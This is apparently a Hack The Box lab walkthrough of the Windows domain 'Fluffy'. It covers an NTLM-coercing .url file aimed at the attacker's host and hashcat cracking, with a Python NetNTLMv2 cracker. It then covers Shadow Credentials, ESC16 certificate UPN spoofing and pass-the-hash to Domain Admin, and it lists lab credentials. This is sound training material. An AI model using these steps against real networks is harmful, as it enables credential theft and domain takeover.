Hack The Box · Lab
Easy · Windows · Active Directory

IP: 10.10.11.69 | Difficulty: Easy | OS: Windows


Environment Setup

export IP=10.10.11.69
# /etc/hosts is root-owned: append with sudo tee instead of a plain shell redirect
echo "10.10.11.69  fluffy.htb dc01.fluffy.htb" | sudo tee -a /etc/hosts

Step 1 — Reconnaissance

Why: Identify open services and domain structure.

nmap -sC -sV -p- --min-rate 10000 -oA nmap/fluffy 10.10.11.69

Key findings: Standard AD ports: 53 (DNS), 88 (Kerberos), 389/636 (LDAP/LDAPS), 445 (SMB), 3268 (Global Catalog), 5985 (WinRM). Domain: fluffy.htb. DC: DC01 (dc01.fluffy.htb).


Step 2 — SMB Enumeration — j.fleischman Foothold

Why: A null (guest) session lists the shares; with j.fleischman's credentials the IT share is READ,WRITE, and it holds a PDF naming the CVE the server is exposed to.

crackmapexec smb 10.10.11.69 --shares -u '' -p ''
nxc smb 10.10.11.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares

Output:

SMB  10.10.11.69  445  DC01  IT  READ,WRITE

smbclient //10.10.11.69/IT -U 'j.fleischman%J0elTHEM4n1990!'
smb: \> ls
  # listing includes a PDF noting the server's CVE exposure (CVE-2024-43451)

Key findings: j.fleischman has READ,WRITE on //IT. The PDF points at CVE-2024-43451, and write access makes the share a drop point for a file that coerces NTLM authentication from anyone who browses it.


Step 3 — CVE-2024-43451 — NTLMv2 Coerce

Why: CVE-2024-43451 (Windows NTLM hash disclosure spoofing, patched November 2024) lets a crafted .url file leak the NetNTLMv2 response of any user who interacts with it in Explorer: the shortcut's file:// target points at the attacker's host and Windows authenticates to it over SMB. j.fleischman has WRITE on //IT, so we upload the file there; a user on the box (p.agila) browses the share and Responder captures the hash.

# Start Responder
sudo responder -I tun0

# Create malicious .url file; 10.10.14.X is the attacker's tun0 address.
# The leading @ makes the file sort first in the share listing.
cat > @file.url << 'EOF'
[InternetShortcut]
URL=file://10.10.14.X/share
EOF

# Upload to IT share
smbclient //10.10.11.69/IT -U 'j.fleischman%J0elTHEM4n1990!'
smb: \> put @file.url

Output:

[SMB] NTLMv2 Username : fluffy\p.agila
[SMB] NTLMv2 Hash     : p.agila::fluffy:<server_challenge>:<NTProofStr>:<blob>

# Save the hash line unchanged to p.agila.hash (hashcat mode 5600 = NetNTLMv2) and crack it
hashcat -m 5600 p.agila.hash /usr/share/wordlists/rockyou.txt

Key findings: Cracked: p.agila:<REDACTED>
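What hashcat -m 5600 does with that line, as an added example (not code from the writeup or from any tool it uses): the NetNTLMv2 response is HMAC-MD5 over the server challenge and the client blob, keyed by HMAC-MD5(NT hash, UPPER(user) + domain), so a candidate password is checked by recomputing NTProofStr from the captured fields. MD4 is written out because hashlib's md4 is often missing on OpenSSL 3 builds. The sample capture, server challenge, blob, wordlist and the password inside them are constructed here and are not lab data.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional

# ---- MD4 (RFC 1320), pure Python so the example runs without the legacy OpenSSL md4 ----
_SHIFTS = ((3, 7, 11, 19), (3, 5, 9, 13), (3, 9, 11, 15))
_ORDER = (tuple(range(16)),
          (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15),
          (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15))
_CONST = (0x00000000, 0x5A827999, 0x6ED9EBA1)
_MIX = (lambda x, y, z: (x & y) | (~x & z),          # F
        lambda x, y, z: (x & y) | (x & z) | (y & z),  # G
        lambda x, y, z: x ^ y ^ z)                    # H


def md4(data: bytes) -> bytes:
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        for rnd in range(3):
            for i in range(16):
                j = (-i) % 4  # updates a, d, c, b in turn, each fed the other three in rotation
                x, y, z = v[(j + 1) % 4], v[(j + 2) % 4], v[(j + 3) % 4]
                t = (v[j] + _MIX[rnd](x, y, z) + words[_ORDER[rnd][i]] + _CONST[rnd]) & 0xFFFFFFFF
                s = _SHIFTS[rnd][i % 4]
                v[j] = ((t << s) | (t >> (32 - s))) & 0xFFFFFFFF
        state = [(a + b) & 0xFFFFFFFF for a, b in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def ntproofstr(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTLMv2: key = HMAC-MD5(NT hash, UPPER(user) || domain); NTProofStr = HMAC-MD5(key, challenge || blob)."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def parse_5600(line: str):
    """Split a hashcat -m 5600 line, user::domain:serverchallenge:ntproofstr:blob, into its fields."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("not a NetNTLMv2 (hashcat 5600) line")
    user, _, domain, chal, proof, blob = parts
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def crack_5600(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose recomputed NTProofStr matches the captured one, else None."""
    user, domain, chal, proof, blob = parse_5600(line)
    for candidate in wordlist:
        if hmac.compare_digest(ntproofstr(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


def forge_capture(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """Build the line Responder would print for this password; used here only to construct sample data."""
    proof = ntproofstr(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample: made-up server challenge and a minimal NTLMv2 blob (version, timestamp,
# client nonce, reserved, empty AV pairs). The password is invented and is not the lab's.
CHALLENGE = bytes.fromhex("1122334455667788")
BLOB = bytes.fromhex("0101000000000000" + "00" * 8 + "aabbccddeeff0011" + "00" * 4 + "00" * 4 + "00" * 4)
SAMPLE_LINE = forge_capture("p.agila", "fluffy", "Summer2025!", CHALLENGE, BLOB)
WORDLIST = ["password", "Welcome1", "Summer2025!", "fluffy123"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack_5600(SAMPLE_LINE, WORDLIST))
```

The user name is uppercased before keying but the domain is used exactly as captured, which is why a Responder line must be fed to hashcat unmodified; re-casing either field silently makes every candidate fail.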


Step 4 — ADCS Enumeration

Why: Confirm ADCS is present and identify the CA name for later exploitation.

nxc ldap 10.10.11.69 -u 'p.agila' -p '<REDACTED>' -M adcs

Output:

ADCS  10.10.11.69  389  DC01  Found PKI Enrollment Server: DC01.fluffy.htb
ADCS  10.10.11.69  389  DC01  Found CN: fluffy-DC01-CA

Key findings: ADCS present — CA: fluffy-DC01-CA on DC01.fluffy.htb.


Step 5 — BloodHound — ACL Path Discovery

Why: BloodHound reveals the escalation path from p.agila: membership in SERVICE ACCOUNTS MANAGERS gives GenericAll over the SERVICE ACCOUNTS group, so p.agila can add itself, and that group holds GenericWrite over winrm_svc, ca_svc and ldap_svc. GenericWrite is enough for Shadow Credentials, and ca_svc in turn unlocks ADCS.

bloodhound-python -u 'p.agila' -p '<REDACTED>' -ns 10.10.11.69 -d fluffy.htb -c all

Output:

p.agila → MemberOf → SERVICE ACCOUNTS MANAGERS
SERVICE ACCOUNTS MANAGERS → GenericAll → SERVICE ACCOUNTS
SERVICE ACCOUNTS → GenericWrite → winrm_svc, ca_svc, ldap_svc

# Add p.agila to SERVICE ACCOUNTS (GenericAll on the group allows adding members)
net rpc group addmem "SERVICE ACCOUNTS" "p.agila" \
    -U "FLUFFY.HTB"/"p.agila"%"<REDACTED>" -S "DC01.FLUFFY.HTB"

# Confirm the membership took effect
net rpc group members "SERVICE ACCOUNTS" \
    -U "FLUFFY.HTB"/"p.agila"%"<REDACTED>" -S "DC01.FLUFFY.HTB"

Key findings: p.agila is now a member of SERVICE ACCOUNTS and inherits GenericWrite over winrm_svc, ca_svc and ldap_svc. The new membership is only reflected in logons and LDAP binds made after the change, so tools run from here on pick it up on their next bind.


Step 6 — Shadow Credentials — winrm_svc

Why: GenericWrite over winrm_svc lets us write its msDS-KeyCredentialLink attribute with pywhisker (Shadow Credentials). The key pair we add is trusted for PKINIT, so we obtain a TGT with the certificate and then use getnthash, which requests a U2U service ticket and decrypts the PAC's credential info with the AS-REP encryption key, yielding the account's NT hash without ever knowing its password. Kerberos rejects requests whose clock is more than 5 minutes off from the DC, so sync time against 10.10.11.69 (e.g. ntpdate) before running gettgtpkinit.

pywhisker.py -d "fluffy.htb" -u "p.agila" -p "<REDACTED>" \
    --target "winrm_svc" --action "add" --export PEM

Output:

[+] Updated the msDS-KeyCredentialLink attribute of winrm_svc
[+] Saved PEM certificate at path: yHBfrZXx_cert.pem
[+] Saved PEM private key at path: yHBfrZXx_priv.pem
# Get TGT via PKINIT; note the AS-REP encryption key it prints, getnthash needs it
gettgtpkinit.py -cert-pem yHBfrZXx_cert.pem -key-pem yHBfrZXx_priv.pem \
    fluffy.htb/winrm_svc winrm_svc.ccache

export KRB5CCNAME=winrm_svc.ccache

# Recover NT hash using AS-REP encryption key
getnthash.py -key b218f1a8c6c39d7e2d7cbf28d033f2180bb0bf66ee83b30b1cb4cae9d7063dbe \
    fluffy.htb/winrm_svc

Output:

Recovered NT Hash
33bd09dcd697600edf6b3a7af4875767

# Pass-the-hash over WinRM (5985)
evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767

Key findings: Shell as winrm_svc. user.txt obtained.


Step 7 — Shadow Credentials — ca_svc

Why: ca_svc is the ADCS service account and holds certificate enrollment rights. The same Shadow Credentials chain as Step 6 recovers its NT hash, which we need to enumerate the CA as ca_svc and to enroll during the ESC16 abuse.

pywhisker.py -d "fluffy.htb" -u "p.agila" -p "<REDACTED>" \
    --target "ca_svc" --action "add" --export PEM

gettgtpkinit.py -cert-pem uswoiVwj_cert.pem -key-pem uswoiVwj_priv.pem \
    fluffy.htb/ca_svc ca_svc.ccache

export KRB5CCNAME=ca_svc.ccache

getnthash.py -key f04ebf8a824a166636a1549e6594c6ae258e2800210871816cc79c369259592a \
    fluffy.htb/ca_svc

Output:

Recovered NT Hash
ca0f4f9e9eb8a092addf53bb03fc98c8

Key findings: ca_svc NT hash recovered: ca0f4f9e9eb8a092addf53bb03fc98c8


Step 8 — Certipy — ESC16 Vulnerability Confirmation

Why: ESC16 is a CA-level misconfiguration: the Security Extension szOID_NTDS_CA_SECURITY_EXT (OID 1.3.6.1.4.1.311.25.2), which embeds the requester's SID in every issued certificate, is globally disabled through the CA policy module's DisableExtensionList, so no template on this CA can produce a strongly mappable certificate. Without the SID the KDC falls back to weak mapping on the SAN UPN (as long as StrongCertificateBindingEnforcement is not set to Full Enforcement), so anyone who can change a user's UPN and enroll as that user gets a certificate that authenticates as any account. Certipy reports ESC16 from version 5.0 onwards.

certipy-ad find -vulnerable -u ca_svc@fluffy.htb \
    -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -stdout

Output:

[!] Vulnerabilities
  ESC16: Security Extension is disabled.
Disabled Extensions: 1.3.6.1.4.1.311.25.2

Key findings: fluffy-DC01-CA is vulnerable to ESC16 — Security Extension disabled, UPN spoofing viable.


Step 9 — ESC16 Exploitation — Impersonate Administrator

Why: ESC16 combined with GenericWrite over ca_svc (held through SERVICE ACCOUNTS; the writeup exercises it as winrm_svc, and p.agila would work as well): (1) temporarily set ca_svc's userPrincipalName to administrator, (2) request a User certificate as ca_svc, (3) restore the UPN, (4) authenticate with the certificate and pull Administrator's NT hash. The CA copies the current UPN into the SAN and, with the Security Extension disabled, adds no SID that would tie the certificate back to ca_svc. The bare value 'administrator' is used rather than administrator@fluffy.htb because the real account already owns that UPN and the directory enforces UPN uniqueness.

# Step 1 — Read current UPN (ca_svc@fluffy.htb)
certipy-ad account -u 'p.agila@fluffy.htb' -p '<REDACTED>' \
    -dc-ip '10.10.11.69' -user 'ca_svc' read

# Step 2 — Update ca_svc UPN to 'administrator'
certipy-ad account -u 'winrm_svc@fluffy.htb' \
    -hashes ':33bd09dcd697600edf6b3a7af4875767' \
    -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update

Output: [*] Successfully updated 'ca_svc'

# Step 3 — Request certificate as ca_svc (UPN now = administrator); reuse the PKINIT TGT from Step 7
export KRB5CCNAME=ca_svc.ccache
certipy-ad req -k -dc-ip '10.10.11.69' \
    -target 'DC01.FLUFFY.HTB' \
    -ca 'fluffy-DC01-CA' \
    -template 'User'

Output:

[*] Got certificate with UPN 'administrator'
[*] Saving certificate and private key to 'administrator.pfx'
# Step 4 — Revert ca_svc UPN
certipy-ad account -u 'winrm_svc@fluffy.htb' \
    -hashes ':33bd09dcd697600edf6b3a7af4875767' \
    -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update

Key findings: Certificate issued with SAN UPN 'administrator' and no SID extension; ca_svc's UPN is restored so no conflicting value is left behind. Ready for PKINIT authentication.
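To see why Steps 8 and 9 work, here is a small model of the KDC's certificate-to-account mapping, added as an example (not code from the writeup or from Certipy, and simplified: the real KDC also checks issuance time against account creation and altSecurityIdentities). The account SIDs are made up, and the implicit-UPN fallback in resolve_san plus the issue/kdc_map helper names are assumptions of this model.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# StrongCertificateBindingEnforcement values on the KDC (KB5014754)
DISABLED, COMPATIBILITY, FULL_ENFORCEMENT = 0, 1, 2
SID_EXT_OID = "1.3.6.1.4.1.311.25.2"  # szOID_NTDS_CA_SECURITY_EXT


@dataclass(frozen=True)
class Account:
    sam: str
    upn: str
    sid: str


@dataclass(frozen=True)
class Certificate:
    san_upn: str                   # otherName UPN in the Subject Alternative Name
    sid_extension: Optional[str]   # requester SID from 1.3.6.1.4.1.311.25.2, None when the CA disables it (ESC16)


def issue(ca_security_ext_enabled: bool, requester: Account) -> Certificate:
    """The CA copies the requester's current UPN into the SAN and adds the SID extension
    only when it is not on the CA's DisableExtensionList."""
    return Certificate(san_upn=requester.upn,
                       sid_extension=requester.sid if ca_security_ext_enabled else None)


def resolve_san(cert: Certificate, directory: List[Account]) -> Optional[Account]:
    """Weak (UPN) mapping. A bare UPN with no '@' is treated as an implicit UPN and matched on
    sAMAccountName; this fallback is an assumption of the model, chosen because the chain
    above sets the UPN to plain 'administrator'."""
    wanted = cert.san_upn.lower()
    for acct in directory:
        if acct.upn.lower() == wanted:
            return acct
    if "@" not in wanted:
        for acct in directory:
            if acct.sam.lower() == wanted:
                return acct
    return None


def kdc_map(cert: Certificate, directory: List[Account], mode: int) -> Tuple[Optional[Account], str]:
    """Simplified KDC decision: strong binding through the SID extension when present,
    otherwise weak UPN mapping unless Full Enforcement is on."""
    target = resolve_san(cert, directory)
    if target is None:
        return None, "no account matches the SAN UPN"
    if cert.sid_extension is not None:
        if cert.sid_extension != target.sid:
            return None, "SID extension does not match the mapped account (rejected)"
        return target, "strong mapping: SID extension matches"
    if mode == FULL_ENFORCEMENT:
        return None, "no SID extension and Full Enforcement is on (rejected)"
    return target, "weak mapping by SAN UPN (KDC logs event 39 in Compatibility mode)"


# Constructed directory; the SIDs are invented and are not from the lab.
ADMIN = Account("Administrator", "administrator@fluffy.htb", "S-1-5-21-1-2-3-500")
CA_SVC = Account("ca_svc", "ca_svc@fluffy.htb", "S-1-5-21-1-2-3-1105")
DIRECTORY = [ADMIN, CA_SVC]


def esc16_request(mode: int, ca_security_ext_enabled: bool) -> Tuple[Optional[Account], str]:
    """Steps 9.2 and 9.3: ca_svc enrolls while its UPN is 'administrator', so the SAN names
    Administrator while the requester (and any SID extension) is still ca_svc."""
    spoofed_ca_svc = Account(CA_SVC.sam, "administrator", CA_SVC.sid)
    cert = issue(ca_security_ext_enabled, spoofed_ca_svc)
    return kdc_map(cert, DIRECTORY, mode)


if __name__ == "__main__":
    for mode_name, mode in (("Compatibility", COMPATIBILITY), ("Full Enforcement", FULL_ENFORCEMENT)):
        for ext in (False, True):
            acct, why = esc16_request(mode, ext)
            who = acct.sam if acct else "REJECTED"
            print(f"{mode_name:16} security ext {'on ' if ext else 'off'}: {who:13} {why}")
```

Run as a script it shows the four cases: the forged certificate is accepted as Administrator only when the CA omits the SID extension and the KDC is not in Full Enforcement; with the extension present the embedded ca_svc SID contradicts the spoofed UPN and the KDC rejects it, which is the whole point of the extension ESC16 switches off.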


Step 10 — Certipy Auth — Administrator NT Hash

Why: certipy auth performs PKINIT with the forged certificate; the KDC maps it to Administrator by UPN (there is no SID to contradict it) and certipy then extracts the NT hash from the PAC via U2U, the same trick getnthash used in Step 6.

certipy-ad auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' \
    -username 'administrator' -domain 'fluffy.htb'

Output:

[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:<REDACTED>

Key findings: Administrator NT hash recovered — pass-the-hash to full domain access.


Step 11 — Evil-WinRM — Administrator

Why: Pass-the-Hash with the Administrator NT hash over WinRM gives an Administrator (Domain Admin) shell on the DC.

evil-winrm -i 10.10.11.69 -u administrator -H <REDACTED>

Output:

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
<REDACTED>

Key findings: 🏴 MACHINE PWNED — DOMAIN ADMIN ACHIEVED


Credentials

Account         Secret
j.fleischman    J0elTHEM4n1990!
p.agila         <REDACTED> (Responder NTLMv2 → hashcat)
winrm_svc       33bd09dcd697600edf6b3a7af4875767 (NT hash, Shadow Credentials)
ca_svc          ca0f4f9e9eb8a092addf53bb03fc98c8 (NT hash, Shadow Credentials)
Administrator   <REDACTED> (NT hash, certipy ESC16)

Full Attack Chain

SMB guest → j.fleischman:J0elTHEM4n1990! → READ,WRITE //IT
└─ CVE-2024-43451: upload @file.url → Responder NTLMv2 p.agila
   └─ hashcat → p.agila:<REDACTED>
      └─ nxc ADCS → fluffy-DC01-CA
         └─ BloodHound: SERVICE ACCOUNTS MANAGERS → GenericAll → SERVICE ACCOUNTS
            │           SERVICE ACCOUNTS → GenericWrite → winrm_svc, ca_svc
            └─ net rpc add p.agila → SERVICE ACCOUNTS
               └─ pywhisker winrm_svc → Shadow Credentials
                  └─ gettgtpkinit + getnthash → winrm_svc NT hash
                     └─ evil-winrm winrm_svc → user.txt ✓
                        └─ pywhisker ca_svc → Shadow Credentials
                           └─ gettgtpkinit + getnthash → ca_svc NT hash
                              └─ certipy find → ESC16 (Security Extension disabled)
                                 └─ update ca_svc UPN → 'administrator'
                                    └─ certipy req User template → administrator.pfx
                                       └─ revert ca_svc UPN
                                          └─ certipy auth → Administrator NT hash
                                             └─ evil-winrm PTH → Administrator → root.txt
                                                🏴 ROOTED

© 0xNRG — Fluffy pwned — 2025-05-24